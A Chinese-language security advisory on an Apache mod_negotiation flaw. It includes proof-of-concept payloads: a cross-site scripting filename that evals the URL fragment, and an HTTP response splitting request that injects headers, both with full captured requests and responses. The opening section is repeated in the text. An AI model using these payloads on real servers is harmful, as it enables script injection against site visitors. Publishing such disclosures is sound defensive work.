BUGTRAQ ID: 27409 Apache HTTP Server是一款流行的Web服务器。 Apache的Mod_negotiation没有正确地过滤406 Not Acceptable响应和300 Multiple Choices消息体中的文件名,这可能导致跨站脚本攻击;此外由于也未经过滤便发送了文件名列表,因此如果文件名中包含有换行符的话还可能导致HTTP响应拆分。 I. 跨站脚本 假设启用了mod_negotiation模块,且攻击者可以上传带有任意名称和mime扩展的文件,如以下名称的jpeg文件: <img src=sa onerror=eval(document.location.hash.substr(1))>.jpg 然后请求该文件,将Accept头设置为image/jpeg; q=0 ---------------------------------------------------- GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))> HTTP/1.1 Host: 127.0.0.1 Accept: image/jpeg; q=0 HTTP/1.1 406 Not Acceptable Date: Tue, 15 Jan 2008 15:43:11 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Alternates: {"<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg} {length 2}} Vary: negotiate TCN: list Content-Length: 610 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>406 Not...
BUGTRAQ ID: 27409 Apache HTTP Server是一款流行的Web服务器。 Apache的Mod_negotiation没有正确地过滤406 Not Acceptable响应和300 Multiple Choices消息体中的文件名,这可能导致跨站脚本攻击;此外由于也未经过滤便发送了文件名列表,因此如果文件名中包含有换行符的话还可能导致HTTP响应拆分。 I. 跨站脚本 假设启用了mod_negotiation模块,且攻击者可以上传带有任意名称和mime扩展的文件,如以下名称的jpeg文件: <img src=sa onerror=eval(document.location.hash.substr(1))>.jpg 然后请求该文件,将Accept头设置为image/jpeg; q=0 ---------------------------------------------------- GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))> HTTP/1.1 Host: 127.0.0.1 Accept: image/jpeg; q=0 HTTP/1.1 406 Not Acceptable Date: Tue, 15 Jan 2008 15:43:11 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Alternates: {"<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg} {length 2}} Vary: negotiate TCN: list Content-Length: 610 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>406 Not Acceptable</title> </head><body> <h1>Not Acceptable</h1> <p>An appropriate representation of the requested resource /&lt;img src=sa onerror=eval(document.location.hash.substr(1))&gt; could not be found on this server.</p> Available variants: <ul> <li><a href="<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg"> <img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> , type image/jpeg</li> </ul> <hr> ----------------------------------------------------- 可见没有过滤文件名,导致跨站脚本攻击。 II. HTTP响应拆分 如果可以设置类似于以下的文件名,就可以使用类似的技术触发HTTP响应拆分: 'junk Header: Injected blah:.jpg' 然后请求urlencode编码的文件名: ------------------------------------------------------ GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1 Host: 127.0.0.1 Accept: image/jpeg; q=0 HTTP/1.1 406 Not Acceptable Date: Tue, 15 Jan 2008 16:06:52 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Alternates: {"junk Header: Injected <----- Here! blah:.jpg" 1 {type image/jpeg} {length 2}} Vary: negotiate TCN: list Content-Length: 508 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>406 Not Acceptable</title> </head><body> <h1>Not Acceptable</h1> <p>An appropriate representation of the requested resource /junk Header: Injected blah: could not be found on this server.</p> Available variants: <ul> <li><a href="junk Header: Injected blah:.jpg">junk Header: Injected blah:.jpg</a> , type image/jpeg</li> </ul> <hr> <address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port 80</address> </body></html> ------------------------------------------------------ 可见头响应被拆分,注入了Header: Injected。 Apache Group Apache <=1.3.39 Apache Group Apache <= 2.2.6 Apache Group Apache <= 2.0.61 厂商补丁: Apache Group ------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: <a href=http://www.apache.org target=_blank>http://www.apache.org</a>
